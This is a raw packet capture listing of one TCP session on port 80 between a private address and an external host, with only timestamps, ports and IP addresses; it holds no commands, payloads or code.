May 6, 2024 07:53:08.952717066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952723026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952737093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952738047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952750921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952763081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952765942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952779055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952783108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952792883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952806950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952807903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952821970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952831984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952836037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952851057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952877998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.952931881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952956915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952970028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952982903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.952982903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953005075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953035116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953105927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953147888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953160048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953175068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953188896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953188896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953206062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953207016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953218937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953234911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953238010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953249931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953263998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953263998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953277111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953289986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953291893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953303099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953310013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953316927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953327894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953330994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953346014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953355074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953365088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953377962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953381062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953392029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953404903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953406096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953419924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953432083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953433990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953447104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953459978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953461885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953473091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953475952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953488111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953504086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953530073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953545094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953558922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953571081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953583956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953586102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953598022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953609943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953613997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953624010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953639030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953639030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953655958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953656912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953680038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953682899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953694105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953706980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953712940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953720093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953731060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953732967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953746080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953758955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953761101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953772068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953773975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953784943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953798056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953800917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953811884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953823090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953826904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953850985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953869104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953876019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953890085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953902960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953916073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953917027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953929901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953932047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953944921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.953948975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953963995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.953984022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954021931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954035997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954061031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954085112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954129934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954142094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954155922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954168081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954176903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954183102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954195976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954196930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954225063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954237938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954368114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954420090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954488993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954502106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954514980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954536915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954567909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954586029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954598904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954612017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954626083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954633951 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954639912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954654932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954664946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954668045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954684019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954698086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954701900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954710960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954714060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954725027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954744101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954756975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954761028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954761028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954771996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954778910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954786062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954799891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954807043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954813957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954827070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954827070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954840899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954854965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954864979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954865932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954880953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954893112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954895020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954906940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954910040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954924107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954929113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954938889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954952955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954955101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954967022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954979897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.954981089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.954996109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955008030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955009937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955024004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955024958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955038071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955050945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955053091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955066919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955081940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955082893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955096006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955099106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955110073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955125093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955131054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955138922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955154896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955154896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955168962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955172062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955183029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955185890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955195904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955209970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955213070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955233097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955245972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955259085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955259085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955272913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955286026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955286980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955298901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955319881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955322027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955343962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955354929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955373049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955399036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955440044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955454111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955475092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955482006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955490112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955502987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955506086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955517054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955524921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955530882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955545902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955549002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955560923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955574989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955579042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955665112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955928087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955941916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955965042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.955986023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.955990076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956000090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956010103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956013918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956032991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956038952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956051111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956065893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956065893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956084013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956090927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956110001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956114054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956124067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956135988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956155062 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956160069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956170082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956176043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956188917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956202984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956202984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956217051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956217051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956229925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956243038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956257105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956265926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956283092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956299067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956321001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956356049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956370115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956382990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956397057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956404924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956423044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956424952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956449032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956449986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956465006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956475973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956495047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956507921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956542969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956554890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956567049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956579924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956588984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956593990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956607103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956608057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956619978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956635952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956645012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956650019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956659079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956672907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956679106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956688881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956693888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956701994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956720114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956746101 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956782103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956795931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956806898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956819057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956830025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956831932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956845045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956845999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956860065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956872940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956873894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956886053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956901073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956907034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956914902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956921101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956932068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956944942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956948996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956959009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.956970930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.956974030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957004070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957010984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957021952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957035065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957046032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957058907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957062006 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957072020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957083941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957088947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957097054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957109928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957110882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957123995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957125902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957138062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957149982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957151890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957168102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957174063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957187891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957207918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.957227945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957241058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957252979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957264900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.957272053 CEST	49741	80	192.168.2.4	5.42.66.10
